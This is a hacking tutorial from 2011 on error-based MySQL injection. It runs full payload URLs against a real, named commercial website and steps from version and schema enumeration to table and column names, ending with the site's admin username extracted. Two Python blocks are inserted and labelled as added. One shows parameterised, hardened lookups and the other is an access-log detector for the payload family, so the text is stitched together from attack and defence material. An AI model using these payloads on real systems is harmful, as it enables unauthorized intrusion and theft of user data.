
October 07, 2011

Tutorial Error Based SQL Injection [ p0pc0rn ]

Error Based SQL Injection

I want to teach you SQL injection using the error-based technique.
There are many ways to do error-based injection.
So I'll teach the simple and basic one; you can find the others on security/hacking forums and blogs.

Thanks to rozalman, who gave me a website I could use as the example.
Before proceeding, take note: when can we use this technique?

Test target:
Code:
hxxp://www.radiantwholefood.com.my/content.php?cat=136

Basically, this is what you need to know.

Code:
and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,sayahensem,0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

So which part do we change to get the result we want?

This part: ((select concat(0x7e,0x27,sayahensem,0x27,0x7e)) from information_schema.tables limit 0,1)
So basically it is the same as the other injection techniques; we just need to change a little.
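Why the probe above produces an error at all, and what stops it, is easiest to see on the application side. The following Python example is added here and is not code from this post or from the site it uses; it replaces the site's PHP/MySQL stack with a constructed in-memory SQLite table, so it does not reproduce the MySQL "Duplicate entry" message that the floor(rand(0)*2) ... GROUP BY construct produces. What it does show is the channel the technique depends on: a query that splices ?cat= straight into SQL and echoes the driver's error text to the client, beside a lookup that validates the parameter type, binds it as a value, and returns only a generic message.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    """In-memory stand-in for the site's content table (constructed sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE content (id INTEGER PRIMARY KEY, cat INTEGER, title TEXT)")
    conn.executemany(
        "INSERT INTO content (cat, title) VALUES (?, ?)",
        [(136, "Category 136 article"), (137, "Category 137 article")],
    )
    return conn


# The post's first probe (version/user/database), exactly as it reaches the
# database once the raw ?cat= value has been concatenated into the query.
PAGE_PROBE = (
    "136 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,"
    "version(),0x3a,user(),0x3a,database(),0x27,0x7e)) from information_schema.tables "
    "limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)"
)


def vulnerable_lookup(conn: sqlite3.Connection, cat_param: str) -> dict:
    """Builds the query by string concatenation and returns the driver's error
    text to the caller: that echoed error is what error-based injection reads."""
    sql = "SELECT title FROM content WHERE cat=" + cat_param
    try:
        return {"rows": [r[0] for r in conn.execute(sql)], "error": None}
    except sqlite3.Error as exc:
        # Under MySQL this is where "Duplicate entry '~'...'~1' for key 1" would
        # surface; SQLite simply rejects the unknown functions/tables.
        return {"rows": [], "error": str(exc)}


def hardened_lookup(conn: sqlite3.Connection, cat_param: str) -> dict:
    """Validates the type, binds the value, and never returns driver error text."""
    try:
        cat = int(cat_param)
    except ValueError:
        return {"rows": [], "error": "invalid category"}
    try:
        rows = conn.execute("SELECT title FROM content WHERE cat=?", (cat,))
        return {"rows": [r[0] for r in rows], "error": None}
    except sqlite3.Error:
        # Log the exception server-side; the client only ever sees a generic message.
        return {"rows": [], "error": "lookup failed"}


if __name__ == "__main__":
    db = make_demo_db()
    print("vulnerable, normal input :", vulnerable_lookup(db, "136"))
    print("vulnerable, page probe   :", vulnerable_lookup(db, PAGE_PROBE))
    print("hardened, normal input   :", hardened_lookup(db, "136"))
    print("hardened, page probe     :", hardened_lookup(db, PAGE_PROBE))
```

The two fixes are independent and both matter: binding the value removes the injection, and suppressing driver error text removes the channel, so that even a query that does break (a later bug, a different parameter) leaks nothing about the schema.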


So to enumerate the user, database and version in use, I do this:
Code:
http://www.radiantwholefood.com.my/content.php
?cat=136 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,version(),0x3a,user(),0x3a,database(),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

The result:
[Image: 59981735514715453430.png]

So to see the database you are interested in, use this:
Code:
http://www.radiantwholefood.com.my/content.php
?cat=136 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,schema_name,0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

In LIMIT 0,1, increase it to 1,1 to see the next database.
I found out that the database I want is:
Code:
Duplicate entry '~'radiant_ezlitev3'~1' for key 1

Hex-encode that database name. You will get this:
Code:
0x72616469616e745f657a6c6974657633

To see the table names that exist in that database:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,table_name,0x27,0x7e) FROM information_schema.tables Where table_schema=0xdb_yang_udah_dihexkan limit 3,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
Same as before: you only need to increase the LIMIT number to find the table you want to look at.

Code:
http://www.radiantwholefood.com.my/content.php
?cat=136 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,table_name,0x27,0x7e) FROM information_schema.tables Where table_schema=0x72616469616e745f657a6c6974657633 limit 3,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

I found the table name I want, namely:
Code:
Duplicate entry '~'usertb'~1' for key 1

Now how do you see the column names in that table?
You only need to add this.
Change table_name to column_name and information_schema.tables to information_schema.columns, then add the code below inside the injection:
Code:
AND table_name=0xtable_name_yg_dah_dihexkan

So it becomes this:
Code:
http://www.radiantwholefood.com.my/content.php
?cat=136 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,column_name,0x27,0x7e) FROM information_schema.columns Where table_schema=0x72616469616e745f657a6c6974657633 AND table_name=0x757365727462 limit 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

The result:
Code:
Duplicate entry '~'UserName'~1' for key 1

I chose the column name UserName. To see its contents, I use this:
Code:
and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,table_name.column_name,0x27,0x7e) FROM database_name.table_name LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

So it becomes this:

Code:
http://www.radiantwholefood.com.my/content.php
?cat=136 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,usertb.Username,0x27,0x7e) FROM radiant_ezlitev3.usertb LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
The result:
Code:
Duplicate entry '~'admin'~1' for key 1
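The walk from version() to schema names, table names, column names and finally rows leaves a recognisable trail in the web server's access log: one source sending the floor(rand(0)*2) ... group by x)a construct with information_schema references, and a LIMIT offset that goes up by one per request. The following Python scanner is an added example and not part of this post; the log lines it runs over are constructed (common log format, RFC 5737 documentation addresses, a made-up timestamp) and carry the post's own payloads URL-encoded the way a browser would send them. The indicator names and the "limit walk" rule are this example's own choices.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (common log format). Line 2 carries the
# post's version/user/database probe; lines 3-5 carry its schema_name probe
# with LIMIT 0,1 / 1,1 / 2,1, i.e. the enumeration walk the post describes.
SCHEMA_PROBE = (
    "cat=136+and(select+1+from(select+count(*),concat((select+(select+(SELECT+distinct+"
    "concat(0x7e,0x27,schema_name,0x27,0x7e)+FROM+information_schema.schemata+LIMIT+{n},1))"
    "+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables"
    "+group+by+x)a)"
)
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Oct/2011:10:00:01 +0800] "GET /content.php?cat=136 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [07/Oct/2011:10:00:05 +0800] "GET /content.php?cat=136%20and(select%201%20from('
    'select%20count(*),concat((select%20(select%20concat(0x7e,0x27,version(),0x3a,user(),0x3a,'
    'database(),0x27,0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x'
    '%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 812',
] + [
    f'203.0.113.9 - - [07/Oct/2011:10:00:{9 + 4 * n:02d} +0800] '
    f'"GET /content.php?{SCHEMA_PROBE.format(n=n)} HTTP/1.1" 500 812'
    for n in range(3)
] + [
    '198.51.100.2 - - [07/Oct/2011:10:01:00 +0800] "GET /content.php?cat=137 HTTP/1.1" 200 4800',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Each indicator is one structural feature of the payload family shown in the post.
INDICATORS = {
    "floor_rand_group_by": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)"),
    "derived_table_alias": re.compile(r"group\s+by\s+\w+\s*\)\s*\w+"),
    "information_schema": re.compile(r"information_schema\."),
    "hex_string_literal": re.compile(r"\b0x[0-9a-f]{2,}\b"),
}
LIMIT_RE = re.compile(r"limit\s+(\d+)\s*,\s*1\b")


def normalize_query(target: str) -> str:
    """Decode the query string (twice, to catch double encoding), collapse whitespace, lowercase."""
    query = urlsplit(target).query
    decoded = unquote_plus(unquote_plus(query))
    return re.sub(r"\s+", " ", decoded).lower()


def classify(line: str):
    """Parse one log line; return None if it is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    q = normalize_query(m["target"])
    return {
        "ip": m["ip"],
        "status": int(m["status"]),
        "indicators": [name for name, rx in INDICATORS.items() if rx.search(q)],
        "limit_offsets": [int(x) for x in LIMIT_RE.findall(q)],
    }


def scan(lines):
    """Return flagged requests plus, per source, the LIMIT offsets it has walked."""
    alerts = []
    offsets_by_ip = {}
    for line in lines:
        ev = classify(line)
        if ev is None or not ev["indicators"]:
            continue
        alerts.append(ev)
        offsets_by_ip.setdefault(ev["ip"], set()).update(ev["limit_offsets"])
    # Two or more distinct LIMIT offsets from one source = row-by-row enumeration.
    limit_walk = {ip: sorted(o) for ip, o in offsets_by_ip.items() if len(o) >= 2}
    return {"alerts": alerts, "limit_walk": limit_walk}


if __name__ == "__main__":
    result = scan(SAMPLE_LOG)
    for ev in result["alerts"]:
        print(ev["ip"], ev["status"], ev["indicators"], ev["limit_offsets"])
    print("limit walk:", result["limit_walk"])
```

The string indicators catch this exact payload family; whitespace tricks or inline comments would need extra normalisation before matching. The LIMIT-walk rule is the more robust signal, because the enumeration described in the post cannot avoid stepping the offset, and a burst of 500 responses from one source to the same endpoint is the same trail seen from the status column.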

Panda, that's all.

You should now be able to understand how to use this technique from this tutorial.
Once again, sorry if you don't understand the language I use. :'(
